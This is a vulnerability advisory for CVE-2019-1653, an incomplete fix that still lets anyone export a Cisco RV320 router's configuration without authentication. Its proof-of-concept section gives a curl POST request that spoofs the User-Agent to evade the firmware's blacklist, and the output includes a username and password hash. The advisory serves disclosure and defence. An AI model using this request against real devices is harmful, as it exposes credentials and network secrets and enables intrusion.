Advisory: Cisco RV320 Unauthenticated Configuration Export
RedTeam Pentesting discovered that the configuration of a Cisco RV320
router can still be exported without authentication via the device's web
interface due to an inadequate fix by the vendor.


Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 through 1.4.2.20
Fixed Versions: none
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL:
Vendor Status: working on patch
Advisory URL:
Advisory Status: published
CVE: CVE-2019-1653
CVE URL:


Introduction
============

"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."

(from the Cisco RV320 product page [1])


More Details
============

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface, which is implemented in various CGI programs in
the device's firmware. Access to this web interface requires prior
authentication using a username and password. Previously, RedTeam
Pentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI
program:

/cgi-bin/config.exp

By issuing an HTTP GET request to this program, it was possible to
export a router's configuration without providing any prior
authentication. This vulnerability was addressed in firmware version
1.4.2.19 published by Cisco [3].

RedTeam Pentesting discovered that the CGI program in the patched
firmware is still vulnerable. By performing a specially crafted HTTP
POST request, attackers are still able to download the router's
configuration. The firmware rejects requests carrying the user agent
"curl", so a different User-Agent header must be sent by the HTTP
client; this blacklist is a client-side hint, not an authentication
check.
Again, exploitation does not require any authentication.


Proof of Concept
================

A device's configuration can be retrieved by issuing an HTTP POST request
to the vulnerable CGI program (output shortened):

------------------------------------------------------------------------
$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \
    ''
####sysconfig####
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]
------------------------------------------------------------------------


Workaround
==========

Prevent untrusted clients from connecting to the device's web server.


Fix
===

None


Security Risk
=============

This vulnerability is rated as a high risk as it exposes the device's
configuration to untrusted, potentially malicious parties. By
downloading the configuration, attackers can obtain internal network
configuration, VPN or IPsec secrets, as well as password hashes for the
router's user accounts. Knowledge of a user's password hash is
sufficient to log into the router's web interface; cracking the hash
is not required.
Any information obtained through exploitation of this
vulnerability can be used to facilitate further compromise of the device
itself or attached networks.


Timeline
========

2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-22 Firmware 1.4.2.20 released by vendor
2019-01-23 Advisory (rt-sa-2018-002) published
2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published


References
==========

[1]
[2]
[3]


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at: